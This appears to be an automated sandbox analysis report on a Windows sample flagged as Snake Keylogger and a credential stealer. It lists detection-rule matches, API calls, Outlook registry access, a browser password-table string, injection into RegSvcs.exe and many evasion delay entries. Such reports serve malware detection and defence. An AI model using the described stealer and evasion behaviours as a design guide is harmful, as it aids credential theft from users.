                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: String function: 00746AC0 appears 42 times
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: String function: 0074F8A0 appears 35 times
                  Source: VIAmJUhQ54.exe, 00000001.00000003.1285847604.000000000397D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs VIAmJUhQ54.exe
                  Source: VIAmJUhQ54.exe, 00000001.00000003.1285323072.00000000037D3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs VIAmJUhQ54.exe
                  Source: VIAmJUhQ54.exe, 00000001.00000002.1289354649.0000000003690000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs VIAmJUhQ54.exe
                  Source: VIAmJUhQ54.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 1.2.VIAmJUhQ54.exe.3690000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 1.2.VIAmJUhQ54.exe.3690000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 1.2.VIAmJUhQ54.exe.3690000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 1.2.VIAmJUhQ54.exe.3690000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000008.00000002.3712605161.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000001.00000002.1289354649.0000000003690000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000001.00000002.1289354649.0000000003690000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: Process Memory Space: VIAmJUhQ54.exe PID: 5924, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: RegSvcs.exe PID: 7336, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/2@3/3
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_0076CE7A GetLastError,FormatMessageW,1_2_0076CE7A
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_0075AB84 AdjustTokenPrivileges,CloseHandle,1_2_0075AB84
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_0075B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,1_2_0075B134
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_0076E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,1_2_0076E1FD
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_00766532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,1_2_00766532
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_0077C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,1_2_0077C18C
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_0072406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,1_2_0072406B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeFile created: C:\Users\user\AppData\Local\Temp\autF3C4.tmpJump to behavior
                  Source: VIAmJUhQ54.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: RegSvcs.exe, 00000008.00000002.3714455601.0000000002B56000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.3714455601.0000000002B78000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.3714455601.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.3714455601.0000000002B64000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.3714455601.0000000002B85000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.3715154814.0000000003A8D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: VIAmJUhQ54.exeReversingLabs: Detection: 79%
                  Source: VIAmJUhQ54.exeVirustotal: Detection: 69%
                  Source: unknownProcess created: C:\Users\user\Desktop\VIAmJUhQ54.exe "C:\Users\user\Desktop\VIAmJUhQ54.exe"
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\VIAmJUhQ54.exe"
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\VIAmJUhQ54.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: VIAmJUhQ54.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: VIAmJUhQ54.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: VIAmJUhQ54.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: VIAmJUhQ54.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: VIAmJUhQ54.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: VIAmJUhQ54.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: VIAmJUhQ54.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: wntdll.pdbUGP source: VIAmJUhQ54.exe, 00000001.00000003.1285323072.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, VIAmJUhQ54.exe, 00000001.00000003.1285847604.0000000003850000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: VIAmJUhQ54.exe, 00000001.00000003.1285323072.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, VIAmJUhQ54.exe, 00000001.00000003.1285847604.0000000003850000.00000004.00001000.00020000.00000000.sdmp
                  Source: VIAmJUhQ54.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: VIAmJUhQ54.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: VIAmJUhQ54.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: VIAmJUhQ54.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: VIAmJUhQ54.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_0073E01E LoadLibraryA,GetProcAddress,1_2_0073E01E
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_0073288B push 66007323h; retn 0079h1_2_007328E1
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_00746B05 push ecx; ret 1_2_00746B18
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_0074BDAA push edi; ret 1_2_0074BDAC
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_0074BEC3 push esi; ret 1_2_0074BEC5
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_00788111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,1_2_00788111
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_0073EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,1_2_0073EB42
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_0074123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_0074123A
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeAPI/Special instruction interceptor: Address: F06F9C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599891Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599766Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599656Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599547Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599438Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599313Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599188Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599063Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598953Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598844Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598719Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598609Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598498Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598391Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598281Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598171Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598063Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597938Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597828Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597719Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597594Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597484Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597375Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597266Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597155Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597047Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596938Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596813Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596703Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596594Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596469Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596115Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595948Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595841Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595734Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595625Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595516Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595406Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595297Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595188Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595078Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594969Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594844Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594734Jump to behavior
